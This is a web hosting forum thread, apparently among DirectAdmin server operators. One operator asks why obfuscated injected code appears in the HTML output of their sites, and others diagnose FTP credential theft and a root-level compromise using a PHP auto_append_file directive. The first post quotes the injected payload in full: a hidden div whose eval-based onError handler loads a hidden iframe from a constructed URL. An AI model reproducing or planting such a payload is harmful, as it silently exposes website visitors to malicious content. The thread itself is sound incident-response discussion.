php Infection?

[more123]

My Server is Centos 4. with DA 1.36.2
Apache 2.2.10 Running
DirectAdmin 1.36.2 Running
Exim 4.67 Running
MySQL 5.0.67 Running
Named 9.3.6 Running
ProFTPd 1.3.1 Running
sshd Running
dovecot 1.1.7 Running
Php 5.2.6 Installed
---------------------------------------
some websites run http://domain.com/index.php show up virus alerts
I had checked their code, but nothing found.

Yesterday, I install wordpress 3.04 the newest version. and create a new subdomain wp website. it show up virus alerts again.

I view the html source I found some code has added to my index.php

</body></html>
<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="5765" height="1" width="1"><img src="about:blank" onError='astro=unescape("%27");astru=unescape("%22");sksa=eval("document.getElementById("+astro+"seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"+astro+")+document.getElementById("+astro+"5765"+astro+").id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"1294168884"+astro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.getElementById("seaid").src=sksa' style="width:300;height:300;border:0px;"><iframe id="seaid" src="about:blank"></iframe></div>

But when I reload the index.php the code disapper.

Any body could help?

 

[scsi]

Ever plan on upgrading all of your old software for one? Most of your version replies are old versions of software.

 

[more123]

I run yum update everday.
exclude=apache* httpd* mod_* mysql* MySQL* da_* *ftp* exim* sendmail* php* bind-chroot*

should I rebuild php?

 

[zEitEr]

Probably you need upgrade all PHP applications: especially open-sourced scripts, CMS, etc.

Find last modified date for your injected PHP scripts, and find IPs in FTP logs for that periods. Perhaps your FTP passwords were stolen. Change passwords for accounts (Directadmin/FTP) with injected files.

 

[scsi]

cd /usr/local/directadmin/custombuild
./build update
./build clean
./build update_versions

 

[nobaloney]

@scsi,

We generally build rewrite_confs as well.

Do you not see the need to do that? Or am I missing something? Or causing problems?

Thanks.

Jeff

 

[zEitEr]

It's bots using FTP, that do that kind of injections in most cases. OS Windows viruses/trojans steal passwords to FTP accounts stored/cached by FTP clients (eg. Total Commander) and send them to master. After that bot browsing FTP injects specified files.

 

[scsi]

I have never seen update_confs ... never used that before when updating.

I dont even see update_confs in http://files.directadmin.com/services/custombuild/1.1/custombuild/build

Did you mean rewrite_confs? I highly doubt thats needed at all and im sure that if a conf rewrite was needed the installer would do that.

 

[nobaloney]

Sorry... rewrite_confs; I misremembered. I've edited my post.

Jeff

 

[AndyII]

pretty sure you have a root hack, check usr/local/lib/php
for a file called sys.php
need to add this, in your httpd.config, look for this and remove the 2 lines starting with php_admin_value
</VirtualHost>
# php_admin_value error_reporting 0
# php_admin_value auto_append_file /usr/local/lib/php/sys.php
###</IfDefine>

My Server is Centos 4. with DA 1.36.2
Apache 2.2.10 Running
DirectAdmin 1.36.2 Running
Exim 4.67 Running
MySQL 5.0.67 Running
Named 9.3.6 Running
ProFTPd 1.3.1 Running
sshd Running
dovecot 1.1.7 Running
Php 5.2.6 Installed
---------------------------------------
some websites run http://domain.com/index.php show up virus alerts
I had checked their code, but nothing found.

Yesterday, I install wordpress 3.04 the newest version. and create a new subdomain wp website. it show up virus alerts again.

I view the html source I found some code has added to my index.php




But when I reload the index.php the code disapper.

Any body could help?